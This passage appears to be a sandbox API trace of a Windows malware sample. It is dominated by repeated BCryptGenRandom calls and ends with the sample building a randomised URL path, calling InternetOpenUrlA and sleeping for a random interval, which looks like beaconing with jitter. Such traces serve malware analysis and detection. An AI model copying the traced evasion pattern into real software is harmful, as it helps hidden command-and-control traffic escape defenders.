cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02391, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a02391) returned 0x0 [0262.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.187] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.187] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0262.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.188] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023c2, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a023c2) returned 0x0 [0262.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0262.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a023d6, cbBuffer=0x2b, dwFlags=0x2 | out: pbBuffer=0x3a023d6) returned 0x0 [0262.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0262.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0262.398] GetProcessHeap () returned 0x440000 [0262.398] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0262.398] lstrcpyA (in: lpString1=0x473140, lpString2="P# \x03" | out: lpString1="P# \x03") returned="P# \x03" [0262.398] lstrcatA (in: lpString1="P# \x03", lpString2="/b5bgci33g1ieKv2ueoSs7f8rtotrqQuOt/6n7ezHv48Cz437kibquEA6k1f62w3/6Gg0evnAhn3vk7jype9xYxtpr1i5LjkyeIsu2zr0tWm2sz08/1vQwyJnPr0m55it32kE/p0e0fih0hIzbqCrqAn8Kip384qoolsfb9l6lh2p4ge/" | out: lpString1="P# \x03/b5bgci33g1ieKv2ueoSs7f8rtotrqQuOt/6n7ezHv48Cz437kibquEA6k1f62w3/6Gg0evnAhn3vk7jype9xYxtpr1i5LjkyeIsu2zr0tWm2sz08/1vQwyJnPr0m55it32kE/p0e0fih0hIzbqCrqAn8Kip384qoolsfb9l6lh2p4ge/") returned="P# \x03/b5bgci33g1ieKv2ueoSs7f8rtotrqQuOt/6n7ezHv48Cz437kibquEA6k1f62w3/6Gg0evnAhn3vk7jype9xYxtpr1i5LjkyeIsu2zr0tWm2sz08/1vQwyJnPr0m55it32kE/p0e0fih0hIzbqCrqAn8Kip384qoolsfb9l6lh2p4ge/" [0262.398] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0262.398] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P# \x03/b5bgci33g1ieKv2ueoSs7f8rtotrqQuOt/6n7ezHv48Cz437kibquEA6k1f62w3/6Gg0evnAhn3vk7jype9xYxtpr1i5LjkyeIsu2zr0tWm2sz08/1vQwyJnPr0m55it32kE/p0e0fih0hIzbqCrqAn8Kip384qoolsfb9l6lh2p4ge/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0262.398] GetProcessHeap () returned 0x440000 [0262.398] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0262.399] GetProcessHeap () returned 0x440000 [0262.399] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02350 | out: hHeap=0x440000) returned 1 [0262.399] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0262.399] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0262.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0262.400] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0262.400] Sleep (dwMilliseconds=0x159f2) [0262.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0262.526] BCryptGenRandom (in: hAlgorithm=0x0, 